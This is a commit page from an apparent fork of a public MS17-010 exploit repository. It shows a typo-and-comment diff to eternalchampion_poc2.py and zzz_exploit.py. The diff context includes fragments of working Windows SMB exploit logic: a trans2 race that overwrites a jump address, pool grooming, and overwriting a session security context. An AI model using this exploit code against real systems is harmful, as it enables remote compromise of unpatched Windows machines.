bozhihouc/MS17-010
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

typo and some comment

Browse Source
This commit is contained in:
worawit
2017-06-22 22:16:20 +07:00
parent df6ff967cb
commit acaa27cc80
2 changed files with 6 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
eternalchampion_poc2.py
View File

@@ -24,7 +24,7 @@ target = sys.argv[1]
pipe_name = sys.argv[2] pipe_name = sys.argv[2]
# this one must do something to restore execution # this one must do something to restore execution
# Note: when stagine shellcode is executed, CONNECTION+0x3d0 is at top of stack # Note: when staging shellcode is executed, CONNECTION+0x3d0 is at top of stack
staging_sc = '\xcc'*128 staging_sc = '\xcc'*128
def login_put_staging_sc(conn, staging_sc, maxBufferSize): def login_put_staging_sc(conn, staging_sc, maxBufferSize):
@@ -111,7 +111,7 @@ def nsa_race(conn, jmp_addr):
mid = conn.next_mid() mid = conn.next_mid()
# we will overwrite 8 bytes at displacement 312, so data must be at least 320 bytes # we will overwrite 8 bytes at displacement 312, so data must be at least 320 bytes
req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid) req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid)
# chnage infoLevel to SMB_INFO_IS_NAME_VALID # change infoLevel to SMB_INFO_IS_NAME_VALID
req2 = conn.create_trans2_secondary_packet(mid, param=pack('<H', 6)) req2 = conn.create_trans2_secondary_packet(mid, param=pack('<H', 6))
req3 = conn.create_trans2_secondary_packet(mid, data=pack('<Q', jmp_addr), dataDisplacement=312) req3 = conn.create_trans2_secondary_packet(mid, data=pack('<Q', jmp_addr), dataDisplacement=312)

6
zzz_exploit.py
View File

@@ -26,7 +26,7 @@ USERNAME = ''
PASSWORD = '' PASSWORD = ''
''' '''
Reverse from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext() Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
win7 x64 win7 x64
struct SrvSecContext { struct SrvSecContext {
DWORD xx1; // second WORD is size DWORD xx1; // second WORD is size
@@ -293,6 +293,7 @@ def exploit(target, pipe_name):
for i in range(10): for i in range(10):
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$') tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
conn.set_default_tid(tid) conn.set_default_tid(tid)
# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
fid = conn.nt_create_andx(tid, pipe_name) fid = conn.nt_create_andx(tid, pipe_name)
if not FRAG_POOL_SIZE: if not FRAG_POOL_SIZE:
leak_frag_size(conn, tid, fid) leak_frag_size(conn, tid, fid)
@@ -315,7 +316,7 @@ def exploit(target, pipe_name):
shift_indata_byte = 0x200 shift_indata_byte = 0x200
conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte) conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
# Note: Even the distance between bride transaction is exact what we want, the groom transaction might be in a wrong place. # Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
# So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong. # So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
indata_value = info['next_page_addr'] + 0x100 + 0x10 + 0x1000 + shift_indata_byte # maxParameterCount (0x1000) indata_value = info['next_page_addr'] + 0x100 + 0x10 + 0x1000 + shift_indata_byte # maxParameterCount (0x1000)
indata_next_trans_displacement = info['trans2_addr'] - indata_value indata_next_trans_displacement = info['trans2_addr'] - indata_value
@@ -375,6 +376,7 @@ def exploit(target, pipe_name):
secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE']) secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
print('overwriting session security context') print('overwriting session security context')
# see FAKE_SECCTX detail at top of the file
write_data(conn, info, secCtxAddr, info['FAKE_SECCTX']) write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
# ================================ # ================================